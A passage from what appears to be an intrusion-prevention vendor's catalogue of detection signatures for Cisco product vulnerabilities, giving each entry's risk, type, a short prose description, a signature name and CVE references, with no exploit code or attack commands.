First detected in: sgpkg-ips-787-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco IOS HTTP Server
Type: Cross-site Scripting
Description: A cross site scripting vulnerability exists in the IOS HTTP server versions 11.0 through 12.4.
Situation: HTTP_CRL-Cisco-IOS-HTTP-Server-Cross-Site-Scripting
References:
CVE-2005-3921
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3921
BID-16291
http://www.securityfocus.com/bid/16291
BID-15602
http://www.securityfocus.com/bid/15602
Back to top

Cisco-IOS-Telnet-Denial-of-Service

About this vulnerability: A Cisco IOS Telnet Denial of Service vulnerability
Risk: High
First detected in: sgpkg-ips-952-5242
Last changed: sgpkg-ips-1296-5242
Platform: Cisco IOS
Software: Cisco IOS Telnet
Type: Insecure Configuration
Description: A vulnerability in Cisco IOS telnet service, effecting multiple switches, which allows remote attackers to execute arbitrary code or cause a denial of service condition by sending malformed CMP specific telnet options.
Situation: Telnet_CS-Cisco-IOS-Telnet-Denial-of-Service
References:
CVE-2017-3881
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3881
BID-96960
http://www.securityfocus.com/bid/96960
Back to top

Cisco-IOS-XE-Command-Injection-CVE-2023-20273

About this vulnerability: A vulnerability in Cisco IOS XE
Risk: High
First detected in: sgpkg-ips-1648-5242
Last changed: sgpkg-ips-1648-5242
Platform: Cisco
Software: <os>
Type: Input Validation
Description: A command injection vulnerability has been reported in a web UI component of the Cisco IOS XE software. A remote, authenticated attacker can use this vulnerability to inject arbitrary commands as root. Chaining this vulnerability together with CVE-2023-20198 allows unauthenticated remote code execution on the target server.
Situation: HTTP_CS-Cisco-IOS-XE-Command-Injection-CVE-2023-20273
References:
CVE-2023-20273
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-20273
Back to top

Cisco-IOS-XE-CVE-2023-20198-Implant-Detection

About this vulnerability: An attempt to exploit a vulnerability in Cisco IOS detected
Risk: High
First detected in: sgpkg-ips-1642-5242
Last changed: sgpkg-ips-1642-5242
Platform: Cisco IOS
Software: <os>
Type: Input Validation
Description: The web UI feature of Cisco IOS XE, when exposed to the Internet or to untrusted networks, could be exploited by a remote, unauthenticated attacker to create an account on an affected system with privilege level 15 access. The attacker can then use that account to gain control of the affected system. This fingerprint does not prevent the vulnerability from being exploited, but it detects the usage of the malicious implant which has been widely deployed to vulnerable systems in the wild.
Situation: HTTP_CSU-Cisco-IOS-XE-CVE-2023-20198-Implant-Detection
File-Text_Cisco-IOS-XE-CVE-2023-20198-Implant-Detection
References:
CVE-2023-20198
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-20198
Back to top

Cisco-IOS-XE-Privilege-Escalation-CVE-2023-20198

About this vulnerability: A vulnerability in Cisco IOS XE
Risk: High
First detected in: sgpkg-ips-1646-5242
Last changed: sgpkg-ips-1656-5242
Platform: Cisco
Software: <os>
Type: Input Validation
Description: A privilege escalation vulnerability has been reported in a web UI component of the Cisco IOS XE software. A remote, unauthenticated attacker can use this vulnerability to create an account with administrative access.
Situation: HTTP_CSU-Cisco-IOS-XE-Privilege-Escalation-CVE-2023-20198
File-TextId_Cisco-IOS-XE-Privilege-Escalation-CVE-2023-20198
References:
CVE-2023-20198
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-20198
Back to top

Cisco-IOS-XE-Rest-API-Authentication-Bypass

About this vulnerability: A vulnerability in Cisco Systems REST API virtual service container
Risk: Moderate
First detected in: sgpkg-ips-1194-5242
Last changed: sgpkg-ips-1296-5242
Platform: Cisco IOS
Software: <os>
Type: Malfunction
Description: There exists an authentication bypass vulnerability in the Cisco REST API virtual service container. This vulnerability could be exploited remotely. Successful exploitation could lead in authentication bypass.
Situation: HTTP_CSU-Cisco-IOS-XE-Rest-API-Authentication-Bypass
References:
CVE-2019-12643
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12643
Back to top

Cisco-IOS-XE-Webui-Command-Injection

About this vulnerability: A vulnerability in Cisco Systems IOS XE
Risk: Moderate
First detected in: sgpkg-ips-1647-5242
Last changed: sgpkg-ips-1647-5242
Platform: Cisco IOS
Software: <os>
Type: Input Validation
Description: Insufficient validation of IPv6 addresses supplied when performing a software upgrade causes a command injection vulnerability in the Cisco IOS WebUi. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: HTTP_CRL-Cisco-IOS-XE-Webui-Command-Injection
References:
CVE-2023-20273
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-20273
Back to top

Cisco-IOS-XE-Webui-Command-Injection-CVE-2019-12650

About this vulnerability: A vulnerability in Cisco IOS XE
Risk: High
First detected in: sgpkg-ips-1841-5242
Last changed: sgpkg-ips-1841-5242
Platform: Cisco IOS
Software: <os>
Type: Input Validation
Description: A command injection vulnerability in Cisco IOS XE Software Web UI allows an authenticated attacker to execute arbitrary OS commands with root privileges. This vulnerability is due to improper sanitization of a user-provided HTTP parameter value.
Situation: HTTP_CRL-Cisco-IOS-XE-Webui-Command-Injection-CVE-2019-12650
References:
CVE-2019-12650
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12650
Back to top

Cisco-IOS-XE-Webui-Command-Injection-CVE-2019-12651

About this vulnerability: A vulnerability in Cisco IOS XE
Risk: High
First detected in: sgpkg-ips-1841-5242
Last changed: sgpkg-ips-1841-5242
Platform: Cisco IOS
Software: <os>
Type: Input Validation
Description: A command injection vulnerability in the Web UI of Cisco IOS XE Software allows an authenticated attacker to execute arbitrary Cisco IOS commands. This vulnerability is due to the improper sanitization of a user-provided HTTP parameter value.
Situation: HTTP_CRL-Cisco-IOS-XE-Webui-Command-Injection-CVE-2019-12651
References:
CVE-2019-12651
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12651
Back to top

Cisco-License-Manager-Server-Reportcsv-Directory-Traversal

About this vulnerability: A vulnerability in Cisco Systems License Manager
Risk: Moderate
First detected in: sgpkg-ips-1000-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Systems License Manager
Type: Directory Traversal
Description: Insufficient validation of paths sent to the reportCSV servlet causes a directory traversal vulnerability in Cisco Systems License Manager. A successful exploit allows an attacker to access arbitrary files on the target system.
Situation: HTTP_CSU-Cisco-License-Manager-Server-Reportcsv-Directory-Traversal
References:
CVE-2017-12263
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12263
Back to top

Cisco-Linksys-PlayerPT-ActiveX-Control-Buffer-Overflow

About this vulnerability: A vulnerability in Linksys (Cisco Systems) PlayerPT
Risk: Moderate
First detected in: sgpkg-ips-446-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Linksys PlayerPT
Type: Buffer Overflow
Description: A buffer overflow vulnerability has been reported in the Cisco Linksys PlayerPT ActiveX control. The vulnerability is due to insufficient boundary checks when handling parameters passed to the SetSource() function. A remote, unauthenticated attacker can exploit this vulnerability by enticing an unsuspecting user to access a malicious website. This can lead to code execution in the context of the target user. If code execution is unsuccessful, the application may terminate unexpectedly.
Situation: File-Text_Cisco-Linksys-PlayerPT-ActiveX-Control-Buffer-Overflow
References:
OSVDB-80297
http://www.osvdb.org/80297
Back to top

Cisco-Linksys-PlayerPT-Buffer-Overflow

About this vulnerability: A Cisco Linksys PlayerPT Buffer Overflow vulnerability.
Risk: High
First detected in: sgpkg-ips-709-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Linksys PlayerPT
Type: Buffer Overflow
Description: A buffer overflow vulnerability in Cisco Linksys PlayerPT ActiveX Control, version 1.0.0.15, which allows remote attackers to execute arbitrary code via a long URL in the first argument of a SetSource method.
Situation: File-Text_Cisco-Linksys-PlayerPT-Buffer-Overflow
References:
CVE-2012-0284
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0284
BID-54588
http://www.securityfocus.com/bid/54588
OSVDB-84309
http://www.osvdb.org/84309
Back to top

Cisco-Network-Admission-Control-Directory-Traversal

About this vulnerability: A Cisco Network Admission Control Directory Traversal vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-712-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Network Admission Control
Type: Directory Traversal
Description: A vulnerability in Cisco Network Admission Control, versions 4.8.x, which allows remote attackers to read arbitrary files via directory traversal.
Situation: HTTP_CSU-System-File-Disclosure
References:
CVE-2011-3305
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3305
BID-49954
http://www.securityfocus.com/bid/49954
OSVDB-76080
http://www.osvdb.org/76080
Back to top

Cisco-Network-Registrar-Default-Credentials-Authentication-Bypass

About this vulnerability: An attempt to exploit vulnerability in Cisco Network Registrar (CUPS) detected
Risk: Moderate
First detected in: sgpkg-ips-395-4219
Last changed: sgpkg-ips-1583-5242
Platform: Generic
Software: Cisco Network Registrar
Type: Insecure Configuration
Description: An authentication weakness vulnerability exists in Cisco Network Registrar. The vulnerability is due to using a default password for the administrative account.
Situation: HTTP_CRL-Cisco-Network-Registrar-Default-Credentials-Authentication-Bypass
References:
CVE-2011-2024
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2024
BID-48076
http://www.securityfocus.com/bid/48076
OSVDB-72720
http://www.osvdb.org/72720
Back to top

Cisco-Nexus-Dashboard-Fabric-Controller-Amf-Insecure-Deserialization

About this vulnerability: A vulnerability in Cisco Systems Nexus Dashboard Fabric Controller
Risk: Moderate
First detected in: sgpkg-ips-1505-5242
Last changed: sgpkg-ips-1505-5242
Platform: Generic
Software: Cisco Systems Nexus Dashboard Fabric Controller
Type: Input Validation
Description: Improper validation of user-sent data when processing AMF messages causes an insecure deserialization vulnerability in Cisco Systems Nexus Dashboard Fabric Controller. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: HTTP_CRL-Cisco-Nexus-Dashboard-Fabric-Controller-Amf-Insecure-Deserialization
Back to top

Cisco-NX-OS-Section-And-Less-Privilege-Escalation

About this vulnerability: A vulnerability in Cisco Systems Cisco NX-OS
Risk: Moderate
First detected in: sgpkg-ips-421-4219
Last changed: sgpkg-ips-1296-5242
Platform: Cisco
Software: <os>
Type: Input Validation
Description: There is a command execution vulnerability in Cisco NX-OS. The vulnerability is due to insufficient validation of CLI input containing the pipe character (|). Remote authenticated attackers can exploit this vulnerability by using specially crafted commands on a vulnerable system. Successful exploitation could cause execution of restricted commands, resulting in access to the underlying Linux operating system.
Situation: Telnet_Telnet-Cisco-NX-OS-Section-And-Less-Privilege-Escalation
References:
CVE-2011-2569
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2569
OSVDB-76620
http://www.osvdb.org/76620
Back to top

Cisco-Prime-Collaboration-Provisioning-Arbitrary-File-Deletion

About this vulnerability: A vulnerability in Cisco Systems Prime Collaboration Provisioning
Risk: Moderate
First detected in: sgpkg-ips-1009-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Systems Prime Collaboration Provisioning
Type: Directory Traversal
Description: Cisco Prime Collaboration Provisioning software has a vulnerability, which can lead to arbitrary deletion of files by a remote, unauthenticated attacker.
Situation: HTTPS_CS-Cisco-Prime-Collaboration-Provisioning-Arbitrary-File-Deletion
References:
CVE-2017-6637
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6637
Back to top

Cisco-Prime-Collaboration-Provisioning-Licensestatus-Arbitrary-File-Deletion

About this vulnerability: A vulnerability in Cisco Systems Prime Collaboration Provisioning
Risk: Moderate
First detected in: sgpkg-ips-944-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Systems Prime Collaboration Provisioning
Type: Directory Traversal
Description: Insufficient validation of HTTP requests causes an arbitrary file deletion vulnerability in Cisco Systems Prime Collaboration Provisioning. A successful attack allows a remote attacker to delete arbitrary files on the target system.
Situation: HTTP_CRL-Cisco-Prime-Collaboration-Provisioning-Licensestatus-Arbitrary-File-Deletion
References:
CVE-2017-6635
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6635
Back to top

Cisco-Prime-Collaboration-Provisioning-Logconfigtracer.jsp-Directory-Traversal

About this vulnerability: A vulnerability in Cisco Systems Prime Collaboration Provisioning
Risk: Moderate
First detected in: sgpkg-ips-970-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Systems Prime Collaboration Provisioning
Type: Directory Traversal
Description: Improper validation of filenames causes a directory traversal vulnerability in Cisco Systems Prime Collaboration Provisioning. A successful attack allows arbitrary file access remotely without authentication.
Situation: HTTP_CRL-Cisco-Prime-Collaboration-Provisioning-Logconfigtracer.jsp-Directory-Traversal
References:
CVE-2017-6621
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6621
Back to top

Cisco-Prime-Collaboration-Provisioning-Scriptmgr-Authentication-Bypass

About this vulnerability: A vulnerability in Cisco Systems Prime Collaboration Provisioning
Risk: Moderate
First detected in: sgpkg-ips-943-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Systems Prime Collaboration Provisioning
Type: Malfunction
Description: Improper validation of HTTP requests causes an authentication bypass vulnerability in Cisco Systems Prime Collaboration Provisioning. A successful attack allows a remote attacker to run arbitrary code with root privileges.
Situation: HTTP_CSU-Cisco-Prime-Collaboration-Provisioning-Scriptmgr-Authentication-Bypass
References:
CVE-2017-6622
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6622
Back to top

Cisco-Prime-Data-Center-Network-Manager-Downloadservlet-Information-Disclosure

About this vulnerability: A vulnerability in Cisco Systems Prime Data Center Network Manager
Risk: High
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Systems Prime Data Center Network Manager
Type: Directory Traversal
Description: An information disclosure vulnerability exists in Cisco Prime Data Center Network Manager. The vulnerability is due to lack of authentication and insufficient input validation in DownloadServlet when processing HTTP requests. A remote unauthenticated attacker can download arbitrary files from arbitrary locations. This can be leveraged to obtain sensitive information from a target system.
Situation: HTTP_CRL-Cisco-Prime-Data-Center-Network-Manager-Downloadservlet-Information-Disclosure
References:
CVE-2013-5487
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5487
BID-62483
http://www.securityfocus.com/bid/62483
OSVDB-97428
http://www.osvdb.org/97428
Back to top

Cisco-Prime-Data-Center-Network-Manager-Fileupload-Arbitrary-File-Upload

About this vulnerability: A vulnerability in Cisco Systems Prime Data Center Network Manager (DCNM)
Risk: Moderate
First detected in: sgpkg-ips-1183-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Systems Prime Data Center Network Manager
Type: Input Validation
Description: There has been reported an arbitrary file upload vulnerability in Cisco Prime Data Center Network Manager. Successful exploitation can lead in arbitrary code execution.
Situation: HTTP_CS-Cisco-Prime-Data-Center-Network-Manager-Fileupload-Arbitrary-File-Upload
References:
CVE-2019-1620
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1620
Back to top

Cisco-Prime-Data-Center-Network-Manager-Fileuploadservlet-Arbitrary-File-Upload

About this vulnerability: A vulnerability in Cisco Systems Prime Data Center Network Manager
Risk: Moderate
First detected in: sgpkg-ips-558-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Systems Prime Data Center Network Manager
Type: Input Validation
Description: An arbitrary file upload vulnerability exists in Cisco Prime Data Center Network Manager. The vulnerability is due to lack of authentication and insufficient input validation in the FileUploadServlet when processing HTTP requests. A remote unauthenticated attacker can upload arbitrary files to arbitrary locations. In a successful attack scenario, the attacker can execute arbitrary code with SYSTEM privileges by placing files in critical locations.
Situation: HTTP_CSU-Cisco-Prime-Data-Center-Network-Manager-Fileuploadservlet-Arbitrary-File-Upload
References:
CVE-2013-5486
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5486
BID-62484
http://www.securityfocus.com/bid/62484
OSVDB-97425
http://www.osvdb.org/97425
Back to top

Cisco-Prime-Data-Center-Network-Manager-Information-Disclosure

About this vulnerability: A vulnerability in Cisco Systems Prime Data Center Network Manager
Risk: High
First detected in: sgpkg-ips-639-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Systems Prime Data Center Network Manager
Type: Directory Traversal
Description: An information disclosure vulnerability has been reported in Cisco Prime Data Center Network Manager. The vulnerability is due to an input validation error that allows the retrieval of arbitrary files from the server. By sending crafted HTTP requests to the target system, a remote unauthenticated attacker can leverage this vulnerability to view the contents of arbitrary files on a target server with System privileges.
Situation: HTTP_CSU-Cisco-Prime-Data-Center-Network-Manager-Information-Disclosure
References:
CVE-2015-0666
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0666
Back to top

Cisco-Prime-Data-Center-Network-Manager-Processimagesave-Arbitrary-File-Upload

About this vulnerability: A vulnerability in Cisco Systems Prime Data Center Network Manager
Risk: Moderate
First detected in: sgpkg-ips-558-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Systems Prime Data Center Network Manager
Type: Directory Traversal
Description: There is an arbitrary file upload vulnerability in Cisco Prime Data Center Network Manager. The vulnerability is due to lack of authentication and insufficient input validation in the processImageSave.jsp when processing HTTP requests. A remote unauthenticated attacker can upload arbitrary files to arbitrary locations. In a successful attack scenario, the attacker can execute arbitrary code with SYSTEM privileges by placing executable files in critical locations.
Situation: HTTP_CRL-Cisco-Prime-Data-Center-Network-Manager-Processimagesave.jsp-Arbitrary-File-Upload
References:
CVE-2013-5486
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5486
BID-62484
http://www.securityfocus.com/bid/62484
OSVDB-97426
http://www.osvdb.org/97426
Back to top

Cisco-Prime-Infrastructure-And-Dcnm-Xmpfileuploadservlet-Directory-Traversal

About this vulnerability: A vulnerability in Cisco Systems Prime Data Center Network Manager
Risk: Moderate
First detected in: sgpkg-ips-1070-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Systems Prime Data Center Network Manager; Cisco Systems Prime Infrastructure
Type: Input Validation
Description: Improper validation of request parameters causes a directory traversal vulnerability in Cisco Systems Prime Data Center Network Manager. A successful exploit allows an attacker to write arbitrary files into locations where they will be executed.
Situation: HTTP_CRL-Cisco-Prime-Infrastructure-And-Dcnm-Xmpfileuploadservlet-Directory-Traversal
References:
CVE-2018-0258
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0258
Back to top

Cisco-Prime-Infrastructure-And-Epnm-Deserialization-Code-Execution

About this vulnerability: A vulnerability in Cisco Systems Evolved Programmable Network Manager
Risk: Moderate
First detected in: sgpkg-ips-781-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Systems Evolved Programmable Network Manager; Cisco Systems Prime Infrastructure
Type: Input Validation
Description: Insufficient input validation causes a deserialization vulnerability in the affected prducts. A successful exploit allows an attacker to run code at administrative privileges.
Situation: HTTP_CSU-Cisco-Prime-Infrastructure-And-Epnm-Deserialization-Code-Execution
References:
CVE-2016-1291
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1291
Back to top

Cisco-Prime-Infrastructure-And-Epnm-Importjobresults-XSS

About this vulnerability: A vulnerability in Cisco Systems Evolved Programmable Network Manager
Risk: Moderate
First detected in: sgpkg-ips-958-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Systems Evolved Programmable Network Manager; Cisco Systems Prime Infrastructure
Type: Input Validation
Description: A reflected cross-site scripting vulnerability has been reported in Cisco Prime Infrastructure and Evolved Programmable Network Manager. Tricking user to visit a crafter URL may result in arbitrary script code in the target user's browser.
Situation: HTTP_CSU-Cisco-Prime-Infrastructure-And-Epnm-Importjobresults-XSS
References:
CVE-2017-6699
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6699
Back to top

Cisco-Prime-Infrastructure-And-Epnm-Uploadservlet-Tar-Directory-Traversal

About this vulnerability: A vulnerability in Cisco Systems Evolved Programmable Network Manager
Risk: Moderate
First detected in: sgpkg-ips-1173-5242
Last changed: sgpkg-ips-1606-5242
Platform: Generic
Software: Cisco Systems Evolved Programmable Network Manager
Type: Input Validation
Description: Improper validation of a user-supplied tar file causes a directory traversal vulnerability in Cisco Systems Evolved Programmable Network Manager. A successful exploit allows an attacker to overwrite and subsequently execute any file path accessible to the server process.
Situation: File-Binary_Path-Traversal-Via-Tar-Archive
References:
CVE-2019-1821
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1821
Back to top

Cisco-Prime-Infrastructure-And-Epnm-XML-External-Entity-Injection

About this vulnerability: A vulnerability in Cisco Systems Evolved Programmable Network Manager
Risk: Moderate
First detected in: sgpkg-ips-941-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Systems Evolved Programmable Network Manager; Cisco Systems Prime Infrastructure
Type: Input Validation
Description: Inproper handling of external entity tags in Cisco Prime Infrastructure causes a vulnerability that allows an attacker to upload files to the target system and disclose filesystem contents.
Situation: HTTP_CRL-Cisco-Prime-Infrastructure-And-Epnm-Dashboardrenderer-XML-External-Entity-Injection
References:
CVE-2017-6662
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6662
Back to top

Cisco-Prime-Infrastructure-Remote-Code-Execution

About this vulnerability: A vulnerability in Cisco Prime Infrastructure
Risk: High
First detected in: sgpkg-ips-1174-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Systems Prime Infrastructure
Type: Insecure Configuration
Description: A vulnerability in Cisco Prime Infrastructure which allows remote attackers to upload files and execute arbitrary code due to the lack of authentication.
Situation: HTTP_CSU-Cisco-Prime-Infrastructure-Remote-Code-Execution
References:
CVE-2018-15379
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15379
Back to top

Cisco-Prime-Infrastructure-Swimtemp-TFTP-Arbitrary-File-Upload

About this vulnerability: A vulnerability in Cisco Systems Prime Infrastructure
Risk: Moderate
First detected in: sgpkg-ips-1111-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Systems Prime Infrastructure
Type: Malfunction
Description: Improper handling of TFTP file uploads causes a vulnerability in Cisco Systems Prime Infrastructure. A successful exploit allows an attacker to upload files that will be executed on the target system, allowing arbitrary code execution.
Situation: TFTP_CS-Cisco-Prime-Infrastructure-Swimtemp-TFTP-Arbitrary-File-Upload
References:
CVE-2018-15379
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15379
Back to top

Cisco-Prime-Infrastructure-TarArchive-Directory-Traversal

About this vulnerability: A vulnerability in Cisco Prime Infrastructure
Risk: High
First detected in: sgpkg-ips-1196-5242
Last changed: sgpkg-ips-1645-5242
Platform: Generic
Software: Cisco Systems Prime Infrastructure
Type: Directory Traversal
Description: A vulnerability in Cisco Prime Infrastructure 3.4.0.0 which allows remote attackers to upload malicious files and execute arbitrary code due to the lack of proper validation of user input.
Situation: File-Binary_Path-Traversal-Via-Tar-Archive
References:
CVE-2019-1821
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1821
Back to top

Cisco-Prime-Infrastructure-Xmplogfilesdownloadservlet-Directory-Traversal

About this vulnerability: A vulnerability in Cisco Systems Evolved Programmable Network Manager
Risk: Moderate
First detected in: sgpkg-ips-1173-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Systems Evolved Programmable Network Manager
Type: Input Validation
Description: Improper validation of a user-supplied data used for file operations causes a directory traversal vulnerability in Cisco Systems Evolved Programmable Network Manager. A successful exploit allows an attacker to download any file accessible to the server process.
Situation: HTTP_CS-Cisco-Prime-Infrastructure-And-Epnm-Xmplogfilesdownloadservlet-Directory-Traversal
References:
CVE-2019-1819
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1819
Back to top

Cisco-Prime-Lan-Management-Solution-Remote-Command-Execution

About this vulnerability: A vulnerability in Cisco Systems Prime LAN Management Solution
Risk: High
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Systems Prime LAN Management Solution
Type: Malfunction
Description: An access control vulnerability has been reported in Cisco Prime LAN Management Solution. The vulnerability is due to insufficient validation of users using rsh. A remote attacker can exploit this vulnerability by accessing the rsh service. This can result in arbitrary command execution in the context of the root user.
Situation: RSH_CS-Cisco-Prime-Lan-Management-Solution-Remote-Command-Execution
RSH_CS-Cisco-Prime-Lan-Management-Solution-Remote-Command-Execution-2
References:
CVE-2012-6392
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6392
BID-57221
http://www.securityfocus.com/bid/57221
OSVDB-89112
http://www.osvdb.org/89112
Back to top

Cisco-Prime-Network-Analysis-Module-Graph-Sfile-Directory-Traversal

About this vulnerability: A vulnerability in Cisco Systems Prime Network Analysis Module
Risk: Moderate
First detected in: sgpkg-ips-1023-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Systems Prime Network Analysis Module
Type: Input Validation
Description: Improper handling of HTTP request parameters causes a directory traversal vulnerability in Cisco Systems Prime Network Analysis Module. Successful exploitation allows an attacker to access arbitrary files on the target system.
Situation: HTTP_CRL-Cisco-Prime-Network-Analysis-Module-Graph-Sfile-Directory-Traversal
References:
CVE-2017-12285
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12285
Back to top

Cisco-PVC2300-POE-Video-Camera-Configuration-Download

About this vulnerability: A vulnerability in Cisco PVC2300 cameras.
Risk: High
First detected in: sgpkg-ips-1499-5242
Last changed: sgpkg-ips-1499-5242
Platform: Generic
Software: Cisco PVC2300 Cameras
Type: Insecure Configuration
Description: A vulnerability in Cisco PVC2300 Cameras which allows remote attackers to use hardcoded credentials to download the configuration file and obtain admin credentials.
Situation: HTTP_CSU-Cisco-PVC2300-POE-Video-Camera-Configuration-Download
Back to top

Cisco-Remote-Access-VPN-Brute-Force-CVE-2024-20481

About this vulnerability: An attempt to exploit a vulnerability in Cisco Remote Access VPN detected
Risk: High
First detected in: sgpkg-ips-1829-5242
Last changed: sgpkg-ips-1829-5242
Platform: Generic
Software: Cisco Adaptive Security Appliance
Type: Brute Force
Description: A vulnerability in the Remote Access VPN (RAVPN) service of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause a denial-of-service (DoS) of the RAVPN service. This vulnerability is due to resource exhaustion. An attacker could exploit this vulnerability by sending a large number of VPN authentication requests to an affected device. Depending on the impact of the attack, a reload of the device may be required to restore the RAVPN service.
Situation: File-TextId_Cisco-Remote-Access-VPN-Login-Failure
References:
CVE-2024-20481
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20481
Back to top

Cisco-Router-Management-Interface-RCE

About this vulnerability: A vulnerability in Cisco Router Management Interface
Risk: High
First detected in: sgpkg-ips-1196-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cisco Router
Type: Input Validation
Description: A vulnerability in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall, RV130W Wireless-N Multifunction VPN Router, and RV215W Wireless-N VPN Router, which allows remote attackers to execute arbitrary code due to the improper validation of user input.
Situation: HTTP_CRL-Cisco-Router-Management-Interface-RCE
References:
CVE-2019-1663
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1663
Back to top

Cisco-Router-SYNful-Knock

About this vulnerability: Cisco Router SYNful Knock
Risk: High
First detected in: sgpkg-ips-696-5211
Last changed: sgpkg-ips-1296-5242
Platform: Cisco
Software: <os>
Type: Remote Control
Description: SYNful Knock is a Cisco router implant that allows an attacker to remotely control the affected device.
Situation: Generic_CS-Cisco-Router-SYNful-Knock-Command
Back to top

Cisco-RV-Series-Authentication-Bypass-And-Command-Injection

About this vulnerability: A vulnerability in Cisco Small Business Routers.
Risk: High
First detected in: sgpkg-ips-1566-5242
Last changed: sgpkg-ips-1566-5242
Platform: Unix; Linux
Software: Cisco Small Business RV VPN/Routers
Type: Input Validation
Description: A vulnerability in Cisco RV160, RV260, RV340, and RV345 Small Business Routers, with firmware versions 1.0.03.24 and below, which allows remote attackers to execute arbitrary commands via a session ID directory traversal authentication bypass CVE-2022-20705 and a command injection vulnerability CVE-2022-20707.
Situation: HTTP_CS-Cisco-RV-Series-Authentication-Bypass-And-Command-Injection
References:
CVE-2022-20705
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-20705
Back to top

Cisco-RV-Series-Router-Command-Execution-CVE-2023-20118

About this vulnerability: A vulnerability in Cisco RV Series routers
Risk: High
First detected in: sgpkg-ips-1846-5242
Last changed: sgpkg-ips-1846-5242
Platform: Generic
Software: Cisco Router
Type: Input Validation
Description: Insufficient validation of user-supplied input leads into a command execution vulnerability on multiple Cisco RV Series Small Business routers. A remote, authenticated attacker can use this vulnerability to gain root privileges and execute arbitrary commands via a crafted HTTP request.
Situation: HTTP_CSU-Cisco-RV-Series-Router-Command-Execution-CVE-2023-20118
References:
CVE-2023-20118
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-20118
Back to top

Cisco-RV-Series-Router-Remote-Code-Execution-CVE-2022-20699

About this vulnerability: A vulnerability in Cisco RV Routers
Risk: High
First detected in: sgpkg-ips-1444-5242
Last changed: sgpkg-ips-1444-5242
Platform: Generic
Software: Cisco Router
Type: Malfunction
Description: A pre-auth remote code execution vulnerability has been reported in Cisco RV160, RV260, RV340, and RV345 series routers.
Situation: HTTP_CRL-Cisco-RV-Series-Router-Remote-Code-Execution-CVE-2022-20699
References:
CVE-2022-20699
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-20699
Back to top

Cisco-RV320-And-RV325-Information-Disclosure-CVE-2019-1653

